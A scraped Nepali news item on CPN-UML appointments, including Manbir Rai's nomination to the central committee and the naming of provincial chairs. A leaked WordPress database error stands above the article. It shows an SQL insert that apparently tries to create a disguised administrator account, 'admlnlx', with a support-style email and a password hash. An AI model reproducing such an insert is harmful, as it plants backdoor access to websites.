WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRBKIim6xNJI1RPQApwg6Y5huLMwRU/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-16 06:42:10', '', 'admlnlx', 'admlnlx')
नेकपा एमाले सोलुखुम्बुका पुर्व जिल्ला अध्यक्ष मानवीर राई पार्टीको केन्द्रीय सदस्यमा मनोनित हुनुभएको छ । आज बसेको केन्द्रीय कमिटी बैठकले नेता राईलाई केन्द्रीय सदस्यमा मनोनित गरेको नेकपा एमाले सोलुखुम्बुले जनाएको छ ।
त्यागी नेताको रुपमा आफुलाई स्थापित गराउनु सफल राई नेकपा एमाले र माओवादी एकीकरण पछिको नेकपा हँदा पनि जिल्ला अध्यक्षको जिम्मेवारीमा हुनुहुन्थ्यो । नेता राईले केन्द्रीय सदस्यमा बैठकबाट मनोनित हुनुलाई त्याग र योगदानको उपलब्धी भएको प्रतिक्रिया दिनुभयो ।
यसैबीच, १०औँ महाधिवेशन पछिको दोस्रो बैठकबाट नेकपा एमालेले प्रदेश अधिवेशनसम्मका लागि प्रदेश संगठन कमिटीका पदाधिकारी नियुक्त गरेको छ । बैठकले ७ भौगोलिक प्रदेश र एक गैर भौगोलिक गरि ८ प्रदेशका लागि पदाधिकारी तोकेको हो ।
जसअनुसार प्रदेश १ को अध्यक्षमा तुलसी न्यौपाने, २ को अध्यक्षमा रामअवतार यादव, बागमतीको अध्यक्षमा केशवराज पाण्डे, गण्डकीको नवराज शर्मा, लुम्बिनीको अध्यक्षमा राधाकृष्ण कँडेल, कर्णालीको विनोदकुमार शाह र सुदूरपश्चिम प्रदेश अध्यक्षमा दामोदर भण्डारी प्रस्ताव गरिएको छ । उपत्यका विशेष अध्यक्षमा प्रेम पराजुलीलाई प्रस्ताव गरिएको छ ।